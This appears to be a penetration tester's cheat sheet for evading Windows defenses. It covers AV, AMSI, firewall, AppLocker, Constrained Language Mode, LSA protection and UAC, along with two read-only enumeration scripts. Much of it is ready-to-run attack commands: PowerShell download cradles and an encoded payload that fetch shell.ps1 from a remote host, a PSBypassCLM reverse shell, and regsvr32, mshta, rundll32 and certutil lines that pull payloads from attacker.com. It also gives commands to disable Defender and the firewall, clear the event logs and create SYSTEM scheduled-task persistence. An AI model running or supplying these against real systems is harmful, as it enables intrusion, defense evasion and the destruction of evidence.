Defense Enumeration

LOLBAS

AV Evasion

Enumeration

#Windows Defender Status (look at RealTimeProtectionEnabled, IsTamperProtected, AMServiceEnabled and the signature age)
PS C:\> Get-MpComputerStatus

#List AV products registered with Security Center (the root/SecurityCenter2 namespace exists on client SKUs only, not on Windows Server; in productState the second-lowest byte is 0x10 when the product is enabled, 0x00 when it is off)
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct | Select-Object displayName, productState
wmic /namespace:\\root\SecurityCenter2 path AntivirusProduct GET displayName, productState

Disable Security Protections

#Disable Security Protection (needs an elevated shell; when Tamper Protection is on, Defender ignores these changes, so check IsTamperProtected in Get-MpComputerStatus first)
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true -DisableScriptScanning $true -DisableBehaviorMonitoring $true -DisableIOAVProtection $true -DisableIntrusionPreventionSystem $true

#Set exclusion AV Rules (also needs elevation; Tamper Protection on recent builds blocks new exclusions as well)
Add-MpPreference -ExclusionPath "c:\temp" -ExclusionProcess "c:\temp\yourstuffs.exe"

Bypass tools

Identify Bad flags (AV/AMSI)

Note: these tools split the binary and feed the chunks to the local Defender engine to find the bytes that trigger a signature, so Defender must be enabled on your system, but real-time protection must be off (otherwise the chunks get quarantined mid-run) and automatic sample submission must be off (otherwise the chunks are uploaded to Microsoft).

Techniques

Bypass AV/EDR via DInvoke + Sliver

AMSI

Enumeration

#Enumeration option #1: list the registered AMSI providers (one CLSID per provider; Defender registers its own even when no third-party AV is present)
Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers'
#Enumeration option #2: read the engine's private amsiInitFailed flag. $false means AMSI is active in this session, $true means a previous bypass already disabled it. Checking only that the AmsiUtils type exists proves nothing, since the type is always present in PowerShell 5+. This string is itself signatured, so on a monitored host the check may be blocked.
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').GetValue($null)

How to Bypass AMSI

amsi.fail (the generator this line refers to) generates obfuscated PowerShell snippets that break or disable AMSI for the current process. Each snippet is randomized at generation time, so it is less likely to match a static signature, but the snippets are often burned within days and must still get past script block logging on a monitored host.

Bypass reverse shell

Obfuscate the reverse-shell script by renaming the function names, removing the comments and deleting the examples section <# Remove Everything here #>, since those strings are what the static signatures key on; then encode and deliver it as below.

#Encode payload on Linux (-enc expects base64 of UTF-16LE text; echo -n avoids encoding a trailing newline)
echo -n 'IEX(New-Object Net.WebClient).downloadString("http://10.10.14.3/shell.ps1")' | iconv -t UTF-16LE | base64 -w0;echo

#Encode payload on Windows
PS C:\> $str = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'
PS C:\> [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))

#Execute the payload (a single powershell.exe is enough; wrapping it in a second powershell.exe only adds a parent process for the EDR to see)
PS C:\> powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADMALwBzAGgAZQBsAGwALgBwAHMAMQAiACkACgA=

Firewall

Enumeration

# Check firewall status
netsh advfirewall show allprofiles
Get-NetFirewallProfile | Select-Object Name, Enabled

# List firewall rules
Get-NetFirewallRule | Where-Object { $_.Enabled -eq 'True' } | Select-Object DisplayName, Direction, Action
netsh advfirewall firewall show rule name=all

Disable Firewall

Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
netsh advfirewall set allprofiles state off

Manage firewall rules

#Open port (inbound and outbound; adding rules needs an elevated shell, and each rule change is written to the Windows Firewall event log)
netsh advfirewall firewall add rule name="Allow 1234" protocol=TCP dir=in localport=1234 action=allow
netsh advfirewall firewall add rule name="Allow 1234" protocol=TCP dir=out localport=1234 action=allow
netsh advfirewall firewall add rule name="Allow range ports" protocol=TCP dir=in localport=8000-9000 action=allow

EDR

AV Process List

Security Product         Process Names                                                   Notes
Microsoft Defender       MsMpEng.exe, MSASCui.exe (legacy UI); MsSense.exe, SenseIR.exe  Built-in AV; MsSense/SenseIR only appear when the host is onboarded to Defender for Endpoint (EDR)
CrowdStrike Falcon       CSFalconService.exe, CSFalconContainer.exe                      Enterprise EDR; csagent is the kernel driver (csagent.sys), not a process
Elastic Endpoint         elastic-agent.exe, elastic-endpoint.exe                         Source-available EDR (Elastic License)
Carbon Black (VMware)    cb.exe (CB EDR/Response sensor), RepMgr.exe (CB Cloud/Defense)  Behavioral EDR
SentinelOne              SentinelAgent.exe, SentinelServiceHost.exe                      Next-gen AV/EDR
CylancePROTECT           CylanceSvc.exe                                                  AI-based AV
Symantec (Broadcom)      ccSvcHst.exe, Rtvscan.exe                                       Legacy AV
Trend Micro              TmCCSF.exe, ntrtscan.exe                                        Enterprise AV
Kaspersky                avp.exe                                                         Common in SMEs

Enumeration

# ProcessName carries no ".exe" suffix, so match bare names ("cb\.exe" would never match). Path is empty for processes you cannot open, which is normal for protected EDR services from an unprivileged shell; pair this with Get-Service, since the sensor's service survives even when its UI process is not running.
Get-Process | Where-Object {
    $_.ProcessName -match 'MsMpEng|MsSense|CSFalcon|elastic|^cb$|RepMgr|Sentinel|Cylance|ccSvcHst|TmCCSF|^avp$|wazuh|osqueryd|sysmon'
} | Select-Object Name, Id, Path

Constrained Language Mode

#Get LanguageMode (ConstrainedLanguage is normally enforced by AppLocker/WDAC or the __PSLockdownPolicy environment variable; it blocks Add-Type, most .NET type access and reflection, which is why the AMSI one-liners above fail in it)
$executionContext.SessionState.LanguageMode

#Bypass via PSBypassCLM (InstallUtil.exe is Microsoft-signed and lives under the .NET Framework directory, so the default AppLocker rules allow it; its uninstall entry point starts a FullLanguage runspace)
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.14.9 /rport=443 /U C:\Users\amanda\Documents\PsBypassCLM.exe

#Bypass by using PowerShell version 2 (the 2.0 engine has no CLM, no AMSI and no script block logging, but it only works where the deprecated engine and .NET Framework 3.5 are installed)
powershell -version 2

Applocker

Enumeration

Get-AppLockerPolicy -Effective -XML | Out-File "C:\Temp\AppLockerPolicy.xml"

CollectionType

  • Exe → Executables .exe

  • Script → scripts .ps1, .bat, .vbs, etc.

  • Dll → Libraries .dll

  • Msi → Installers

  • Appx → Modern apps (UWP)

EnforcementMode

  • NotConfigured → no policy for that collection; nothing is checked or logged.

  • AuditOnly → executions are allowed but logged to the Microsoft-Windows-AppLocker event logs (Event ID 8003, "would have been prevented from running").

  • Enabled → anything not matched by an allow rule is blocked (Event ID 8004).

✅ AuditOnly means you can run what you like, but every execution that would have been blocked lands in the event log, so it is unrestricted rather than silent.

Device Guard

Enumerate

Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard
  • RequiredSecurityProperties: the platform features the policy requires (1 = base virtualization support, 2 = Secure Boot, 3 = DMA protection, ...). It says what is required, not what is running.

  • VirtualizationBasedSecurityStatus: 0 = not enabled, 1 = enabled but not running, 2 = running. Only 2 means VBS is actually active.

  • SecurityServicesRunning: 1 = Credential Guard, 2 = HVCI (memory integrity). With Credential Guard running, logon secrets live in the isolated LSA process and cannot be read out of lsass.exe even after a PPL bypass.

LSA Protection

Enumeration

reg query HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL
(Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\LSA").RunAsPPL
  • 0 or value absent = disabled: an administrator can open lsass.exe for reading, so mimikatz sekurlsa::logonpasswords works directly.

  • 1 = enabled with UEFI lock: lsass.exe runs as a protected process (PPL); dumping it needs a kernel driver (mimikatz's mimidrv) or another PPL bypass, and deleting the value does not turn it off.

  • 2 = enabled without UEFI lock (Windows 11 22H2 and later): same protection, but an administrator can clear the value and it takes effect on the next reboot.

User Account Control (UAC)

Enumeration

# Check if UAC is enabled (1 = Enabled, 0 = Disabled)
(Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).EnableLUA
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA

# Get UAC prompt behavior (0-5 values)
(Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).ConsentPromptBehaviorAdmin
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin

UAC Values

Registry Key                 Value          Effect                                                        Pentester Impact
EnableLUA                    1              UAC on (default)                                              Admin tokens are filtered; silent elevation needs a UAC bypass
EnableLUA                    0              UAC off (dangerous)                                           Administrators get a full token with no prompts
ConsentPromptBehaviorAdmin   0              Elevate without prompting                                     Best for attackers: any admin process elevates silently
ConsentPromptBehaviorAdmin   1              Prompt for credentials on the secure desktop                  Needs the admin's password; auto-elevate bypasses do not apply
ConsentPromptBehaviorAdmin   2              Prompt for consent on the secure desktop ("Always notify")    User interaction needed; auto-elevate bypasses do not apply
ConsentPromptBehaviorAdmin   3              Prompt for credentials on the normal desktop                  Needs the password, but the prompt is not on the secure desktop
ConsentPromptBehaviorAdmin   4              Prompt for consent on the normal desktop                      User interaction needed
ConsentPromptBehaviorAdmin   5 (default)    Prompt for consent only for non-Windows binaries              Bypassable with auto-elevating Windows binaries (LOLBins)

UAC bypasses only matter when the current account is a member of Administrators and the shell is unelevated (a filtered token); for a standard user there is nothing to bypass and a real privilege escalation is needed.
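As an added example that is not part of the original page, the following PowerShell function collects in one read-only pass what the Defender, AMSI, Firewall, EDR, Constrained Language Mode, AppLocker, Device Guard, LSA Protection and UAC sections above query one command at a time. It targets Windows PowerShell 5.1 or later. The function name, the process/driver name patterns and the productState decode are this example's own assumptions, not something the page states; every query is wrapped so a missing module or an access-denied error is reported as a field value instead of aborting the run.

```powershell
# Added example (not from the original page): one read-only pass over the
# defensive controls enumerated on this page. Assumes Windows PowerShell 5.1+.
function Get-DefensePosture {
    $r = [ordered]@{}

    # Defender engine state; Get-MpComputerStatus needs the Defender module
    try {
        $mp = Get-MpComputerStatus -ErrorAction Stop
        $r.DefenderRealTime = $mp.RealTimeProtectionEnabled
        $r.DefenderTamper   = $mp.IsTamperProtected
        $r.DefenderService  = $mp.AMServiceEnabled
    } catch { $r.DefenderRealTime = "unavailable: $($_.Exception.Message)" }

    # Products registered with Security Center (client SKUs only). Assumption:
    # the commonly documented decode, enabled flag = 0x10 in the second-lowest byte.
    $r.AVProducts = @(Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct -ErrorAction SilentlyContinue |
        ForEach-Object { '{0} (enabled={1})' -f $_.displayName, ((($_.productState -shr 8) -band 0x10) -ne 0) })

    # AMSI providers: CLSIDs under the Providers key, resolved to their COM display names
    $r.AmsiProviders = @(Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers' -ErrorAction SilentlyContinue |
        ForEach-Object { (Get-ItemProperty "Registry::HKEY_CLASSES_ROOT\CLSID\$($_.PSChildName)" -ErrorAction SilentlyContinue).'(default)' })

    # Firewall profile state
    $r.Firewall = @(Get-NetFirewallProfile -ErrorAction SilentlyContinue | ForEach-Object { '{0}={1}' -f $_.Name, $_.Enabled })

    # EDR/AV footprint: processes (ProcessName has no extension), services and kernel
    # drivers. Both patterns are a starting set (assumption); extend them for your estate.
    $procPattern = 'MsMpEng|MsSense|CSFalcon|elastic|^cb$|RepMgr|Sentinel|Cylance|ccSvcHst|TmCCSF|^avp$|wazuh|osqueryd|sysmon'
    $r.EdrProcesses = @(Get-Process | Where-Object ProcessName -match $procPattern |
        ForEach-Object { '{0} ({1})' -f $_.ProcessName, $_.Id })
    $r.EdrServices  = @(Get-Service | Where-Object { $_.Name -match $procPattern -or $_.DisplayName -match $procPattern } |
        ForEach-Object Name)
    $r.EdrDrivers   = @(Get-CimInstance Win32_SystemDriver -ErrorAction SilentlyContinue |
        Where-Object Name -match 'csagent|SentinelMonitor|WdFilter|cbstream|CyProtectDrv' | ForEach-Object Name)

    # PowerShell language mode and AppLocker enforcement per rule collection
    $r.LanguageMode = $ExecutionContext.SessionState.LanguageMode.ToString()
    try {
        [xml]$pol = Get-AppLockerPolicy -Effective -Xml -ErrorAction Stop
        $r.AppLocker = @($pol.AppLockerPolicy.RuleCollection | ForEach-Object { '{0}={1}' -f $_.Type, $_.EnforcementMode })
    } catch { $r.AppLocker = "unavailable: $($_.Exception.Message)" }

    # VBS: VirtualizationBasedSecurityStatus 0=off, 1=enabled but not running, 2=running;
    # SecurityServicesRunning 1=Credential Guard, 2=HVCI
    $dg = Get-CimInstance -Namespace root\Microsoft\Windows\DeviceGuard -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
    $r.VbsStatus          = $dg.VirtualizationBasedSecurityStatus
    $r.VbsServicesRunning = @($dg.SecurityServicesRunning)

    # LSA protection (absent value means 0 = not protected) and UAC policy values
    $lsa = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\LSA' -ErrorAction SilentlyContinue
    $r.RunAsPPL = if ($null -ne $lsa.RunAsPPL) { $lsa.RunAsPPL } else { 0 }
    $uac = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -ErrorAction SilentlyContinue
    $r.EnableLUA                  = $uac.EnableLUA
    $r.ConsentPromptBehaviorAdmin = $uac.ConsentPromptBehaviorAdmin

    # A UAC bypass is only relevant if the account is in Administrators (S-1-5-32-544)
    # and the current token is the filtered, unelevated one.
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    $r.AdminGroupMember = ($id.Groups | ForEach-Object Value) -contains 'S-1-5-32-544'
    $r.Elevated = ([Security.Principal.WindowsPrincipal]$id).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

    [pscustomobject]$r
}

Get-DefensePosture | Format-List
```

Run it from the unprivileged shell you actually have: the fields that come back empty or "unavailable" are themselves information (no Defender module means a Server Core or third-party-only host; empty EdrProcesses with non-empty EdrServices means the sensor is installed but you cannot open its processes).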

Event Log Cleansing

#Needs an elevated shell. Clearing is itself logged: the Security log records Event ID 1102 ("The audit log was cleared") and the System log records 104, and both are forwarded if log collection is in place, so this is noisy rather than stealthy.
wevtutil cl Security
wevtutil cl System
wevtutil cl Application

Writable paths for non-admins (default ACLs; verify on the target, since hardening baselines and upgrades change them)

C:\Windows\Tasks 
C:\Windows\Temp 
C:\windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Tasks_Migrated (present after performing a version upgrade of Windows 10)
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System
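As an added example, not from the original page: rather than trusting the list, probe each directory by creating and then deleting a uniquely named file, which catches both missing directories and the create-but-not-delete ACLs some of these paths carry. The function name and output columns are this example's own; the path list is the one above.

```powershell
# Added example (not from the original page): probe each candidate directory
# with a create-then-delete of a uniquely named file. Read-write, but leaves
# nothing behind unless delete is denied, in which case the leftover is reported.
$candidates = @(
    'C:\Windows\Tasks', 'C:\Windows\Temp', 'C:\Windows\tracing',
    'C:\Windows\Registration\CRMLog', 'C:\Windows\System32\FxsTmp',
    'C:\Windows\System32\com\dmp', 'C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys',
    'C:\Windows\System32\spool\PRINTERS', 'C:\Windows\System32\spool\SERVERS',
    'C:\Windows\System32\spool\drivers\color',
    'C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter', 'C:\Windows\System32\Tasks_Migrated',
    'C:\Windows\SysWOW64\FxsTmp', 'C:\Windows\SysWOW64\com\dmp',
    'C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter',
    'C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System'
)

function Test-WritableDirectory {
    param([string[]]$Path)
    foreach ($dir in $Path) {
        if (-not (Test-Path -LiteralPath $dir -PathType Container)) {
            [pscustomobject]@{ Path = $dir; Exists = $false; Writable = $false; Deletable = $false; Note = 'directory missing' }
            continue
        }
        $probe = Join-Path $dir ('probe-{0}.tmp' -f [guid]::NewGuid())
        try {
            [IO.File]::WriteAllText($probe, 'x')
        } catch {
            # UnauthorizedAccessException is the expected failure on a properly locked-down directory
            [pscustomobject]@{ Path = $dir; Exists = $true; Writable = $false; Deletable = $false; Note = $_.Exception.GetType().Name }
            continue
        }
        $deleted = $true
        try { [IO.File]::Delete($probe) } catch { $deleted = $false }
        $note = if ($deleted) { 'create+delete ok' } else { "create ok, delete denied; $probe left behind" }
        [pscustomobject]@{ Path = $dir; Exists = $true; Writable = $true; Deletable = $deleted; Note = $note }
    }
}

# Every path here sits under C:\Windows, which the default AppLocker rules allow
# for Everyone, so a writable hit is also a default-rule AppLocker bypass location.
Test-WritableDirectory -Path $candidates | Format-Table -AutoSize
```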

LOLBAS Useful Commands to Bypass Security Solutions

regsvr32.exe – Remote Code Execution (scriptlet loaded from a URL)

Bypasses AppLocker default rules and file-based AV on the attacker side; AMSI still sees the script

regsvr32 /s /n /u /i:http://attacker.com/payload.sct scrobj.dll
  • Executes a remote scriptlet (.sct) through scrobj.dll: /n /u skip DllRegisterServer and call DllInstall with the /i string, /s keeps it silent.

  • The attacker never writes the payload to disk, but the URL moniker fetches it through WinINet, so a copy can land in the user's INetCache.

  • regsvr32.exe is Microsoft-signed and lives under C:\Windows, so the default AppLocker rules allow it; the JScript/VBScript inside the scriptlet is still handed to AMSI on Windows 10 and later, and the outbound request shows up in proxy logs.


mshta.exe – HTML Application Loader

Bypasses AppLocker and basic AV

mshta http://attacker.com/payload.hta

Or run inline script:

mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -nop -w hidden -enc <BASE64>""")

powershell.exe with Base64 Payload

Bypasses string-based AV signatures on the command line; script block logging and AMSI still see the decoded script

powershell -nop -w hidden -enc <Base64-Encoded Payload>
  • -enc takes base64 of UTF-16LE text; use it to keep plain-text indicators out of the command line, not as a substitute for obfuscating the script itself.

  • Add -version 2 to fall back to the PowerShell 2.0 engine, which has no AMSI, no script block logging and no Constrained Language Mode; it only works where that deprecated engine and .NET Framework 3.5 are installed, which is rarely the case on current builds.


rundll32.exe – DLL Execution or COM Exploit

AppLocker bypass, script execution

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://attacker.com/shell.sct");

Or execute exported function from a malicious DLL:

rundll32.exe payload.dll,ExportedFunction

InstallUtil.exe – .NET Binary Execution

Bypasses CLM and AppLocker (Microsoft-signed, lives under the .NET Framework directory that the default rules allow)

InstallUtil.exe /logfile= /LogToConsole=true /U payload.exe
  • payload.exe is a .NET assembly containing a class that derives from System.Configuration.Install.Installer, is marked [RunInstaller(true)] and overrides Uninstall(); /U makes InstallUtil call that method instead of Install(), and the assembly's Main() is never run.

  • InstallUtil.exe exists only under the .NET Framework paths (C:\Windows\Microsoft.NET\Framework\v4.0.30319 and Framework64), so call it by full path.


certutil.exe – Download and Decode Payloads

Network evasion, no PowerShell

# Download file from remote server
certutil -urlcache -split -f http://attacker.com/malware.exe evil.exe

# Decode a base64 payload
certutil -decode payload.b64 payload.exe

forfiles.exe – Execute Command as File Handler

Indirect command execution (execution proxy); it does not elevate by itself, so it is not a UAC bypass

forfiles /p C:\Windows\System32 /m notepad.exe /c "cmd /c calc.exe"
  • /p and /m only select a file that has to exist (the original C:\ root does not contain notepad.exe); /c runs the command once per match, so the payload starts with forfiles.exe as its parent instead of the attacker's shell.

wmic.exe – Execute Commands Without PowerShell or CMD

wmic process call create "cmd.exe /c calc.exe"
  • Spawns the process through the WMI Win32_Process provider, so its parent is WmiPrvSE.exe rather than the caller's shell; this breaks naive parent-child rules, but Win32_Process creation is a well-known telemetry source.

  • wmic.exe is deprecated and is a removable feature on current Windows 11 builds; Invoke-CimMethod against Win32_Process is the PowerShell equivalent.


schtasks.exe – Schedule Execution (Persistence + Evasion)

schtasks /create /tn "Updater" /tr "powershell.exe -enc <payload>" /sc onlogon /ru SYSTEM
  • /ru SYSTEM needs an elevated shell; an unprivileged user can still register a task that runs as themselves at logon.

  • schtasks.exe itself is rarely blocked, but task creation is logged (Task Scheduler operational log, and Security Event ID 4698 when object access auditing is enabled).

  • Useful for persistent or delayed payloads.


scriptrunner.exe – Executes Scripts via Signed Binary (App-V client)

scriptrunner.exe -appvscript payload.bat
  • Executes the script or binary given after -appvscript using a trusted Microsoft-signed binary that ships with the App-V client in System32.


msbuild.exe – Inline C# Payload Execution

<!-- Save as payload.xml -->
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Exec">
    <ClassExample />
  </Target>
  <UsingTask TaskName="ClassExample" TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <Task>
      <Code Type="Class" Language="cs">
        <![CDATA[
          using System;
          using Microsoft.Build.Framework;
          using Microsoft.Build.Utilities;
          public class ClassExample : Task {
            public override bool Execute() {
              System.Diagnostics.Process.Start("calc.exe");
              return true;
            }
          }
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>

Then run (msbuild.exe exists only under the .NET Framework directories, so use the full path; the file extension is irrelevant when the project is passed explicitly):

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe payload.xml
